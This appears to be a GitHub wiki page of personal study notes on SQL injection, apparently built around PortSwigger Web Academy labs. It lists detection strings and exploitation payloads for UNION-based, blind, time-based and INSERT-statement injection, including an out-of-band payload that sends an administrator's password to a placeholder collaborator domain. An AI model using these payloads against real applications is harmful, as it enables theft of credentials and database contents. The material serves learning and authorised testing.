Skip to content

Web Academy: SQL injection

Jump to bottom
0xghostwriter edited this page Jun 23, 2021 · 1 revision

Detecting SQLi

Break Query:
    '
    "
    )
    ')
    ")
    #
    -- 
    *
    \
    \'
    --'
Boolean Detection:
    AND 1=1 --
    AND 1=2 --
Time Detection:
    Strings:
         '-sleep(5)-'        (subtracting strings with sleep functioin)
         '; IF (1=1) WAITFOR DELAY '0:0:10'--
         ' sleep(10) --
         '|| pg_sleep(10)--           (concatenate sleep function with string)
         '|| dbms_pipe.receive_message(('a'),10)--          (concatenate sleep with string)
         ' or sleep(10)#
         ';waitfor delay '0:0:__TIME__'--
         https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/SQLi/Generic-BlindSQLi.fuzzdb.txt
    Integers:
        1/sleep(10)
        1-sleep(10)
        -sleep/*f*/(10)
        %0a%0d/sleep(3)
Mathematical Operations:
    1+1
    3-2
Out-of-Band Detection:
    https://github.com/0xhelloworld/bughunter/blob/master/SQL%20Injection%20OOB%20(OAST)%20payloads

Detecting SQLi from bug bounty hunter: https://twitter.com/pwntheweb/status/1253224265853198336

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
  • Look for HTTP 500
  • Look for error messages
  • Look at the content length of response first baseline request and request with SQL injected payload

Exploiting SQLi

Union Based SQLi

  • Use when results of the SQL query are returned in the application's responses

Original Query: SELECT name, description FROM products WHERE category = 'Gifts'

Injection: ' UNION SELECT username, password FROM users--

  • UNION allows you to execute one or more additional SELECT queries
  • Two Requirements for UNION queries to work:
    • Both queries must return the same number of columns (Ask yourself how many columns are being returned by OG query?)
    • Data types in each column must be compatible between both queries (Ask yourself what kind of data the columns from OG query are returning)

Determine Number of Columns Required (ORDER BY METHOD):

  • Try ordering by a specific column number 1,2,3,4 until you get an error

' ORDER BY 3--

Determine Number of Columns Required (UNION SELECT method):

  • Try appending a SELECT query to SELECT X amount of columns until you cause an error. REMEMBER: the query you are injecting into and the UNION SELECT query you are appending must return the SAME number of columns.

' UNION SELECT NULL,NULL--

' UNION SELECT NULL,NULL,NULL--

' UNION SELECT NULL,NULL,NULL,NULL--

Finding Columns with useful data type

  • Most of the columns with critical data will be in string form.
  • The concept is simple, substitute each null value in UNION SELECT for a string until you get something back: ' UNION SELECT 'a',NULL,NULL,NULL-- ' UNION SELECT NULL,'a',NULL,NULL--

Extracting tables via UNION SELECT *'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

Extracting Columns via Union SELECT

  • '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='USERS_ABCDEF'--

Extracting tables via UNION SELECT (ORACLE)

  • '+union+select+table_name,null+from+all_tables

Extracting columns via UNION SELECT (ORACLE) *'+union+select+column_name,null+from+all_tab_columns+where+table_name='USERS_HZMJYI'

TIPS:

Blind SQL Injection

Detecting Blind SQLi

True:

  • ' UNION SELECT 'a' WHERE 1=1--

False:

  • ' UNION SELECT 'a' WHERE 1=2--

True:

  • +OR+1=1--

False:

  • +OR+1=2--

  • Pro tip: there are cases where +OR+1=2-- can still evaluate to true, leaving no difference in the responses between +OR+1=2-- and +OR+1=2--. In this case, if the original query OR the payload evaluates the true, the application will respond with true.

True:

'+AND+1=1--

False:

'+AND+1=2--

  • In this case, AND implies that both the original query AND the payload must evaluate to true. BOTH must be true in order for the query to evaluate to true.

Exploiting blind SQLi via conditional responses

  • Application returns "Welcome Back" if query is successful, if not it returns nothing.
  • For this exploitation technique, you need a normal baseline request and a request with a broken SQL Query (inject ')

xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 'm'--

xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 't'--

xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) = 's'--

Exploiting blind SQLi by conditional error messages

  • Throw an error message if query is true, do nothing if false.

True:

' UNION SELECT CASE WHEN (1=1) THEN 1/0 ELSE NULL END--

False:

' UNION SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END--

  • Throw error message if user is admin and password is 6 characters

'+UNION+SELECT+CASE+WHEN+(username='administrator'+AND+length(password)=6)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--

Exploiting time-based blind SQLi

  • If query is successful then have the database wait. '%3B SELECT CASE WHEN (username='administrator' and substring(password,1,1) > 'a') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-

Detecting blind SQLi via OOB interaction

  • Create an SQL query that triggers an out of band DNS call
'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Exploiting blind SQLi via OOB interaction

'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Tips:

  • Double quotes and single quotes matter, you can't use double quotes on one part of the query and use single quotes on another part of the query. Stick to one.
  • Add one condition to the SQLi query per time. This prevents you from accidental SQL errors EX: Verify SQLi is there (' OR 1=1), check to see if the user you are attacking exists, check to see how long the password is, then start doing substring enumeration.
  • When injecting into a Cookie or URL, try URL encoding. characters such as ; may not be interpreted correctly.
  • SQLi cheatsheet https://portswigger.net/web-security/sql-injection/cheat-sheet

============ Exploiting blind SQL injection in INSERT statements

-Look for functionality that may be adding NEW data (not updating) to the database. ex: first time user register for an app, leaving a review for a product where name and email address is provided

Assume the following INSERT query:

INSERT INTO users (username, email, password) VALUES('tester555', '[email protected]', 'tester555password');
  1. Fuzzing for the vulnerability:
'-sleep(5)-'
  1. Result:
INSERT INTO users (username, email, password) VALUES('tester555', ''-sleep(5)-'', 'tester555password');
  1. Data Extraction Payload:
'-(IF((substring((select database()),1,1)) = 'c', sleep(5), 0))-'
  1. Result: If current database starts with a 'c' sleep 5 seconds.
INSERT INTO users (username, email, password) VALUES('tester7', ''-(IF((substring((select database()),1,1)) = 'c', sleep(5), 0))-'', 'hello1')

References: https://blog.redforce.io/sql-injection-in-insert-update-query-without-comma/ https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/ https://portswigger.net/support/sql-injection-in-different-statement-types

Clone this wiki locally